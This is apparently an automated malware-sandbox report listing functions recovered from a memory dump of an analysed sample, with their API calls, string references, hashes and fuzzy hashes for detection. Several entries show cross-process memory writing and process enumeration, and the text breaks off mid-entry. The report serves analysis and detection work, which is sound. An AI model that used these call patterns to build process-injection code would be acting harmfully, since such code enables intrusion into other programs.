Instruction ID: 297945541406eb1d9b8c0c9336b291421e96551d07a8f683797847ac26b209f9
Opcode Fuzzy Hash: 542a870305ee342cd1523bd96198f2c0d9a108e796d3ecb78b231cfe0fcf1a9f
Instruction Fuzzy Hash: DE41A135A00508AFE7248F68CD54FB97FA9EB09360F040268F995A72A8C373AD41CA40

Function 01002051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 010020C3
_free.LIBCMT ref: 010020E3

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1e45fc54524e069795e3ea98093056e57f1de15eef4a843bfb3176361f6e72c1
Instruction ID: 977769e55b4fcda74f8fb1f81418ef3334d7d610fd291760e32db43c311c15e4
Opcode Fuzzy Hash: 1e45fc54524e069795e3ea98093056e57f1de15eef4a843bfb3176361f6e72c1
Instruction Fuzzy Hash: CF41E636E003009FEB22DF78C984A9DB7F5EF89314F1545A9E655EB392D731A901CB80

Function 01050930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01050951
GetForegroundWindow.USER32 ref: 01050968
GetDC.USER32(00000000), ref: 010509A4
GetPixel.GDI32(00000000,?,00000003), ref: 010509B0
ReleaseDC.USER32(00000000,00000003), ref: 010509E8

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5b9bdb98241f737b3928272859d60acef390b240281799c3b8ec2b36932e469e
Instruction ID: dee5c30b4fea109f0f163cab72dab253f6c2b3da04daa90d83926fc73f31b42b
Opcode Fuzzy Hash: 5b9bdb98241f737b3928272859d60acef390b240281799c3b8ec2b36932e469e
Instruction Fuzzy Hash: 9D218E75600204AFE714EF69D984AAEBBF9FF48700F048069F88AD7365CB75AC44CB90

Function 0100CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0100CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0100CDE9

Part of subcall function 01003820: RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0100CE0F
_free.LIBCMT ref: 0100CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100CE31

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: fa0dad06d6fb9904e4bc58e47c1a74f5e3a26a060ceee5e15cb53d4545a048cf
Instruction ID: 9b26ea651d6ecffda6efffc896ed09603969240d2a2bfdbedee87329864dc7d0
Opcode Fuzzy Hash: fa0dad06d6fb9904e4bc58e47c1a74f5e3a26a060ceee5e15cb53d4545a048cf
Instruction Fuzzy Hash: 7601FC726022557F333325BA6D4CC7F7DADDEC7AA171502A9FE85C7180DE658D0182B0

Function 01002DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00FFF2DE,01003863,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6), ref: 01002DFD
_free.LIBCMT ref: 01002E32
_free.LIBCMT ref: 01002E59
SetLastError.KERNEL32(00000000,00FD1129), ref: 01002E66
SetLastError.KERNEL32(00000000,00FD1129), ref: 01002E6F

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 821785e7971844f27dbfad37acb3d82535ff195f824ced18146e3cb141b3e86e
Instruction ID: d8c94fdba565fcfb894b054e932c0d5332863ed287822ff04d6ddb54aae6a3ee
Opcode Fuzzy Hash: 821785e7971844f27dbfad37acb3d82535ff195f824ced18146e3cb141b3e86e
Instruction Fuzzy Hash: 6F01F9765886416BF62376396D4CD6F159DABE13A1F650028F5D5921D5EA358C014220

Function 0103000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?,?,0103035E), ref: 0103002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?), ref: 01030064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030070

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: fadc88627824b340f4cd6f00810d7f77de3d7c9ebf5147bc3855893b1392e7e1
Instruction ID: c8157c7d94ba7ade70b9beace782c4fdbaa64553fbeb554973a277b089bada1e
Opcode Fuzzy Hash: fadc88627824b340f4cd6f00810d7f77de3d7c9ebf5147bc3855893b1392e7e1
Instruction Fuzzy Hash: 0101A272601205BFEB205F68DD44BAABEEDEF84761F144124FAC5D2218D77ADD408BA0

Function 0103E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0103E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0103E9A5
Sleep.KERNEL32(00000000), ref: 0103E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0103E9B7
Sleep.KERNEL32 ref: 0103E9F3

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 2649a1971142726daa15472736e6375d2ff14d4090702d4144bb2f58131eeea9
Instruction ID: 17059d75b81a095d235168a53b8396d8c7537929e3559de0dff8bfb5df9fce9e
Opcode Fuzzy Hash: 2649a1971142726daa15472736e6375d2ff14d4090702d4144bb2f58131eeea9
Instruction Fuzzy Hash: 4E016931C01629DBDF50AFE4D948AEDBB7CFF49301F000656E9C2B2244CB399552CBA1

Function 0104030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040324
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040331
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 0104033E
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 0104034B
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040358
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040365

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 92a05e3d824efbee831f4b83a2dffa55ec32cc566087c35a8f4439b1a301a66a
Instruction ID: 056dc06c431a820420c97f204e677766cc4a433bfb92e0e2334386b5c1737e78
Opcode Fuzzy Hash: 92a05e3d824efbee831f4b83a2dffa55ec32cc566087c35a8f4439b1a301a66a
Instruction Fuzzy Hash: EC0190B2800B159FD7309F6AD8D0453FBF9BE502163158A7EE2D662931C371A954CF80

Function 010022A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 010022BE

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 010022D0
_free.LIBCMT ref: 010022E3
_free.LIBCMT ref: 010022F4
_free.LIBCMT ref: 01002305

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: eaecfb4712228a110cea549f4bbbca6d4b353e6c830d9259533ae77adeb87880
Instruction ID: 9fdfb9676263031bb9c3bdd0dc48228cade4e1e919ad1e26cb5b6954796559e1
Opcode Fuzzy Hash: eaecfb4712228a110cea549f4bbbca6d4b353e6c830d9259533ae77adeb87880
Instruction Fuzzy Hash: 3EF054B48109159BA623BF54F40488D3FA8F7287A0B900506F4D0D72ECC73B4421AFE4

Function 01032716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0103B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010321D0,?,?,00000034,00000800,?,00000034), ref: 0103B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01032760

Part of subcall function 0103B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0103B3F8

Part of subcall function 0103B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0103B355
Part of subcall function 0103B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01032194,00000034,?,?,00001004,00000000,00000000), ref: 0103B365
Part of subcall function 0103B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01032194,00000034,?,?,00001004,00000000,00000000), ref: 0103B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010327CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0103281A

Strings

@, xrefs: 01032832

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 920bd8b56dcc2f17cd12a1665db2255b62c7906a83fb97004d79f7c411e09982
Instruction ID: f2b6dfaed21bc8351415eafdbf9339b28d2fed532b667d4e23cf18be922c04d0
Opcode Fuzzy Hash: 920bd8b56dcc2f17cd12a1665db2255b62c7906a83fb97004d79f7c411e09982
Instruction Fuzzy Hash: 5F416D72901219BFDB10DFA8CD41AEEBBB8FF59700F108095FA95B7180DA706E45CBA0

Function 0103C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0103C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0103C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010A1990,01875D18), ref: 0103C395

Strings

0, xrefs: 0103C2DF

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 5f507a9d637fa45a31fe8c60af18002d7e3ee1ccf627ecb5ef31477dcdcd8abe
Instruction ID: f46e54a31937358d03f83672d91f658be7e52e062cf534991959dd7b07fce41e
Opcode Fuzzy Hash: 5f507a9d637fa45a31fe8c60af18002d7e3ee1ccf627ecb5ef31477dcdcd8abe
Instruction Fuzzy Hash: E141A0712043029FE720DF29D984B6ABBE8AFC5314F048A5EF9E5E72D1D770A604CB52

Function 01064416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0106CC08,00000000,?,?,?,?), ref: 010644AA
GetWindowLongW.USER32 ref: 010644C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 010644D7

Strings

SysTreeView32, xrefs: 0106447C

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: b4d832829f2de29fe8c7e9d74352ff684e9e021f8d798e25c424fce13194700e
Instruction ID: e0227e0e1a33062277b9d3db5013e92a8bbb4b97d1f10fb40eef2cedd94dd10a
Opcode Fuzzy Hash: b4d832829f2de29fe8c7e9d74352ff684e9e021f8d798e25c424fce13194700e
Instruction Fuzzy Hash: 1431BE31210205AFEF618E38DC46BEA7BA9EB09334F204315FAB5D21E1DB75E8509B50

Function 01064653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01064705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01064713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0106471A

Strings

msctls_updown32, xrefs: 01064684

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: c8796536ec0b657a5829c67a27c63488159c2d9a62bf1d52f2c8205277aa9f76
Instruction ID: 24abfaa8ae673d35bd1d976ca60d3ca9446f96f679ff8a67d5f3fceea33b59ff
Opcode Fuzzy Hash: c8796536ec0b657a5829c67a27c63488159c2d9a62bf1d52f2c8205277aa9f76
Instruction Fuzzy Hash: 24215CB5600209AFEB11DF68DC81DAB37EDEB5A3A4B04005AFA80DB251CB75EC11DB60

Function 010449F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 01044A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 01044A5C
SetErrorMode.KERNEL32(00000000,?,?,0106CC08), ref: 01044AD0

Strings

%lu, xrefs: 01044A6F

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: dede2e5567e1a18df547e337bf2322128931e4af06b51d51adc5ddacf67fc810
Instruction ID: d7647e2aab7394a7b3768540db087dd6eef015a17fc6f8a90e0131aa7a66cfac
Opcode Fuzzy Hash: dede2e5567e1a18df547e337bf2322128931e4af06b51d51adc5ddacf67fc810
Instruction Fuzzy Hash: F3318171A00109AFDB10DF54C984EAA7BF8EF04304F0440A9E945DF352DB75ED45CB61

Function 010641EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0106424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01064264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01064271

Strings

msctls_trackbar32, xrefs: 01064226

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c5d2bdab15cb87f80a40e1f64f3bbf2a186a8765b090ed724876d3e626bff460
Instruction ID: c0ebc7723b622d9b6ecffedb5a85fe47ab3fff8b4fef26c5764da85460f984b4
Opcode Fuzzy Hash: c5d2bdab15cb87f80a40e1f64f3bbf2a186a8765b090ed724876d3e626bff460
Instruction Fuzzy Hash: 44112931240209BEEF215F39CC45FAB3BECEF85B54F110114FAD5E6090D2B1D8519B10

Function 0103007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c1cb39cf56458dd449e01f1d5e2e2e9306d8dba11966d723a84a03747dfbbd
Instruction ID: dbae0eaa9ae505041603fbe0ed8ecc2540fb648b72a8c525f930c830e6d3bcd5
Opcode Fuzzy Hash: 22c1cb39cf56458dd449e01f1d5e2e2e9306d8dba11966d723a84a03747dfbbd
Instruction Fuzzy Hash: C1C13A75A0120AAFDB14CFA8C894AAEBBB9FF88704F108598F545EB255D731ED41CB90

Function 01030436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0106FC08,?), ref: 010305F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0106FC08,?), ref: 01030608
CLSIDFromProgID.OLE32(?,?,00000000,0106CC40,000000FF,?,00000000,00000800,00000000,?,0106FC08,?), ref: 0103062D
_memcmp.LIBVCRUNTIME ref: 0103064E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: d11c1d8ce0737acb61d040833a3353d3e8cf9a4ef19007004413ee41c6ddf964
Instruction ID: 5720831c45b4c2350c202680ed2604148b200fcea2eb41a4266451c94d169162
Opcode Fuzzy Hash: d11c1d8ce0737acb61d040833a3353d3e8cf9a4ef19007004413ee41c6ddf964
Instruction Fuzzy Hash: CC812A75A00109EFCB04DF98C984EEEB7B9FF89315F204598F546AB254DB71AE06CB60

Function 0105A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0105A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0105A6BA

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0105A79C
CloseHandle.KERNEL32(00000000), ref: 0105A7AB

Part of subcall function 00FECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,01013303,?), ref: 00FECE8A

Memory Dump Source

